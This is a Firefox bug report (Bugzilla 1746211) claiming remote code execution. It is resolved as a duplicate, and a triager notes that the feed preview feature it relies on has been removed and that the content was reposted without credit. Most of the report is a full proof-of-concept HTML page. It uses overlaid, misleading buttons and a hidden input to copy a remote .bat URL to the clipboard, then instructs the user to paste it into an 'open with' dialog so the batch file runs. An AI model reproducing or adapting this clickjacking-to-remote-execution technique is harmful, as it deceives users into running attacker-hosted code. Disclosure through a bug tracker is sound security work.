Closed Bug 1746211 Opened 3 years ago Closed 3 years ago

RCE Vulnerability

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
Firefox 95
Type:
defect

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1422231

People

(Reporter: theft, Unassigned)

Details

Attachments

(1 file)

test.html
1.61 KB, text/html
Details
Attached file test.html

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0

Steps to reproduce:

<html>
<head>
<title>Firefox RCE</title>
<style>
#qdiv{
border:0px solid red;
width:400px;
height:300px;
}

#qem{
width:400px;
height:300px;

opacity:0.5;

}

#qbutt{
position:absolute;
top:125px;
left:235px;
width:105px;
}

#qclick{
position:absolute;
top:50px;
left:110px;
width:145px;
}

#qcopy{
position:absolute;
z-index:1000;
}
#qin{
opacity:0.0;
}

#qmsg{
position:absolute;
z-index:9000;
top:50px;
left:270px;
}
</style>
</head>
<body>
<button id="qcopy">Click here first to copy URL</button>
<div id="qdiv"><button id="qbutt">Click here last</button>
<button id="qclick">Click here second</button><div id="qmsg">Then click 'choose app' then paste URL and press 'open'</div>
<embed id="qem" type="application/vnd.mozilla.maybe.feed" src="data:application/vnd.mozilla.maybe.feed;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxmZWVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDA1L0F0b20iPg0KICA8dGl0bGU+cTwvdGl0bGU+DQogIDxsaW5rIGhyZWY9InEiLz4NCiAgPHVwZGF0ZWQ+cTwvdXBkYXRlZD4NCiAgPGF1dGhvcj4NCiAgICA8bmFtZT5xPC9uYW1lPg0KICA8L2F1dGhvcj4NCiAgPGlkPnE8L2lkPg0KICANCiAgPGVudHJ5Pg0KPHRpdGxlIHR5cGU9InhodG1sIj4NCiAgPGRpdiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQogICAgPGI+djxpPmFsPC9pPmlkIDxxPmh0bWw8L3E+PC9iPg0KICA8L2Rpdj4NCjwvdGl0bGU+DQogICAgPHVwZGF0ZWQ+cTwvdXBkYXRlZD4NCiAgICA8c3VtbWFyeT5xPC9zdW1tYXJ5Pg0KICA8L2VudHJ5Pg0KPC9mZWVkPg==" ></body>

</div>
<input id="qin" type="text" value="http://leucosite.com/a.bat"/>

<script>

qcopy.addEventListener("click", function(){qin.select();
document.execCommand("Copy");});
</script>
</body>
</html>

Actual results:

Execution of the batch file from link.

Expected results:

NA, self explanatory

Type: enhancement → defect

qab is pretty clear that this is fixed on their site, and the feed preview feature got removed, so this doesn't do anything anymore.

Please don't post other people's content without referencing it.

Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: